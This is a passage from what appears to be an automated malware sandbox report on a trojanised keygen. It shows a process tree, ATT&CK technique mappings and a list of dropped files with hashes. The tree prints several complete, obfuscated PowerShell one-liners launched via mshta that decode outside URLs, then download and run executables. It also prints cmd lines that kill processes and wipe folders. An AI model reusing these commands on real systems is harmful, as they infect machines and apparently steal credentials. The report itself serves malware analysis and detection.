                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:3060
                                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2388
                                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:2752
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2752 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\541576009971988\\* & exit
                                      8⤵
                                        PID:1120
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /pid 2752
                                          9⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2296
                                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: MapViewOfSection
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2480
                                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2560
                                  • C:\Users\Public\xni.exe
                                    "C:\Users\Public\xni.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:304
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout 1
                              3⤵
                              • Delays execution with timeout.exe
                              PID:1868
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\b.hta"
                              3⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of WriteProcessMemory
                              PID:1176
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                4⤵
                                • Blocklisted process makes network request
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1072
                                • C:\Users\Public\abu.exe
                                  "C:\Users\Public\abu.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2468
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                                    6⤵
                                    • Loads dropped DLL
                                    PID:2516
                                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1428
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                        8⤵
                                        • Loads dropped DLL
                                        PID:2496
                                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1888
                                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                            10⤵
                                            • Executes dropped EXE
                                            PID:432
                                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks processor information in registry
                                        PID:2076
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 2076 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\490255551154181\\* & exit
                                          9⤵
                                            PID:2764
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /pid 2076
                                              10⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:928
                                    • C:\Users\Public\abu.exe
                                      "C:\Users\Public\abu.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:1524
                                    • C:\Users\Public\abu.exe
                                      "C:\Users\Public\abu.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2496
                                    • C:\Users\Public\abu.exe
                                      "C:\Users\Public\abu.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:472
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\b1.hta"
                                3⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of WriteProcessMemory
                                PID:1316
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:432
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 2
                                3⤵
                                • Delays execution with timeout.exe
                                PID:656
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\ba.hta"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1116
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                  4⤵
                                  • Blocklisted process makes network request
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1856
                                  • C:\Users\Public\uam.exe
                                    "C:\Users\Public\uam.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: MapViewOfSection
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2688
                                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: MapViewOfSection
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2832
                                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2160
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 840
                                          8⤵
                                          • Loads dropped DLL
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2044
                                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: MapViewOfSection
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2864
                                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:972
                                    • C:\Users\Public\uam.exe
                                      "C:\Users\Public\uam.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2900
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\ba1.hta"
                                3⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of WriteProcessMemory
                                PID:852
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1288

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Persistence

                          Modify Existing Service

                          1
                          T1031

                          Registry Run Keys / Startup Folder

                          1
                          T1060

                          Defense Evasion

                          Modify Registry

                          6
                          T1112

                          Disabling Security Tools

                          2
                          T1089

                          Install Root Certificate

                          1
                          T1130

                          Credential Access

                          Credentials in Files

                          3
                          T1081

                          Discovery

                          Query Registry

                          2
                          T1012

                          System Information Discovery

                          2
                          T1082

                          Collection

                          Data from Local System

                          3
                          T1005

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\MSVCP140.dll
                          • C:\ProgramData\freebl3.dll
                          • C:\ProgramData\freebl3.dll
                          • C:\ProgramData\freebl3.dll
                          • C:\ProgramData\mozglue.dll
                          • C:\ProgramData\mozglue.dll
                          • C:\ProgramData\mozglue.dll
                          • C:\ProgramData\msvcp140.dll
                          • C:\ProgramData\msvcp140.dll
                          • C:\ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • C:\ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • C:\ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • C:\ProgramData\softokn3.dll
                          • C:\ProgramData\softokn3.dll
                          • C:\ProgramData\softokn3.dll
                          • C:\ProgramData\sqlite3.dll
                          • C:\ProgramData\sqlite3.dll
                          • C:\ProgramData\vcruntime140.dll
                          • C:\ProgramData\vcruntime140.dll
                          • C:\ProgramData\vcruntime140.dll
                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_44918c39-1281-41d7-aac7-46a0d88afe86
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c1d8c47b-ba00-42db-990e-884fbebb0669
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8e81b7c-310c-497f-872a-715e514f7353
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9d1ae44-6198-4da1-995a-da45c8e3c4cf
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          • C:\Users\Admin\AppData\Local\Temp\0ozkbHThc1.exe
                          • C:\Users\Admin\AppData\Local\Temp\0ozkbHThc1.exe
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\Keygen.exe
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\Keygen.exe
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\b.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\b1.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\ba.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\ba1.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\m.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\m1.hta
                          • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\start.bat
                          • C:\Users\Admin\AppData\Local\Temp\5vbg2J8wtU.exe
                          • C:\Users\Admin\AppData\Local\Temp\5vbg2J8wtU.exe
                          • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          • C:\Users\Admin\AppData\Local\Temp\i7Gq6btFX5.exe
                          • C:\Users\Admin\AppData\Local\Temp\i7Gq6btFX5.exe
                          • C:\Users\Admin\AppData\Local\Temp\zH5WYYwW0A.exe
                            MD5

                            013db621a3351e3fb049efd2ccad79ff

                            SHA1

                            a23394ea54dbc5342a77938a2c285ee616185560

                            SHA256

                            df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                            SHA512

                            1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                          • C:\Users\Admin\AppData\Local\Temp\zH5WYYwW0A.exe
                            MD5

                            013db621a3351e3fb049efd2ccad79ff

                            SHA1

                            a23394ea54dbc5342a77938a2c285ee616185560

                            SHA256

                            df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                            SHA512

                            1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          • C:\Users\Public\Natso.bat
                          • C:\Users\Public\Natso.bat
                          • C:\Users\Public\abu.exe
                          • C:\Users\Public\abu.exe
                          • C:\Users\Public\abu.exe
                          • C:\Users\Public\abu.exe
                          • C:\Users\Public\abu.exe
                          • C:\Users\Public\uam.exe
                          • C:\Users\Public\uam.exe
                          • C:\Users\Public\uam.exe
                          • C:\Users\Public\xni.exe
                          • C:\Users\Public\xni.exe
                          • C:\Users\Public\xni.exe
                          • C:\Users\Public\xni.exe
                          • C:\Users\Public\xni.exe
                          • C:\Windows\temp\rqdr2fhk.inf
                          • \??\PIPE\lsarpc
                          • \??\PIPE\srvsvc
                          • \??\PIPE\srvsvc
                          • \??\PIPE\srvsvc
                          • \ProgramData\mozglue.dll
                          • \ProgramData\mozglue.dll
                          • \ProgramData\mozglue.dll
                          • \ProgramData\msvcp140.dll
                          • \ProgramData\msvcp140.dll
                          • \ProgramData\msvcp140.dll
                          • \ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • \ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                            SHA256

                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                            SHA512

                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                          • \ProgramData\nss3.dll
                            MD5

                            bfac4e3c5908856ba17d41edcd455a51

                            SHA1

